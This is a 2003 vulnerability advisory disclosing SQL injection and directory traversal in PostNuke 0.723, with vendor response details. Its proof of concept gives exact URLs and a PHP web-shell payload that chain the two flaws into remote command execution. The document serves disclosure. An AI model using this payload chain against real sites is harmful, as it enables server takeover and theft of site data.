Products: Postnuke v 0.723 (http://www.postnuke.com)
Date: 09 March 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors:  sk_at_scan-associates.net 
    shaharil_at_scan-associates.net 
    munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: Postnuke v 0.723 SQL injection and directory traversing

Description
===========
Postnuke is Web Content Management System written in PHP and using mysql 
as database backend.

Details
=======
There is multiple vulnerabilities in Postnuke v 0.723 as described below.

1) SQL Injection in Members_List module

There is lack in error checking in $sortby variable which is stripslashes.
This variable is used as SQL query to select postnuke member list.

ex:
  
  http://[postnuke 
site]/modules.php?op=modload&name=Members_List&file=index&letter=[username]&sortby=[sql 
query]

2) Directory traversing through $theme variable

Attacker may include file any file named theme.php

ex:
   http://[postnuke site]/index.php?theme=../../../../../../../../tmp

Vendor Response 
=============== 
Vendor has been contacted on 24/02/2003 and fix is available from 
http://www.postnuke.com


http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=2378

Proof of concept
================
Postnuke remote command execution

requirement:
   - PostNuke v0.723 maybe other 
   - PostNuke user
   - Mysql user must have permision to select into outfile (FILE_PREV)

1) Register as postnuke user.

2) Login as user you just registered. After login change your "Real name" 
   to something like "<?system($HTTP_GET_VARS[cmd])?>" or just 
"<?system($cmd)?>"

3) Sql injection in "Members_List" modules.
   Select user information into /tmp/theme.php
.
   http://[postnuke 
site]/modules.php?op=modload&name=Members_List&file=index&letter=[your 
username]&sortby=uname+into+outfile+'/tmp/theme.php'%23

4) Directory traversing in $theme variable
   Run command on server
   
   http://[postnuke 
site]/index.php?theme=../../../../../../../../tmp&cmd=[command]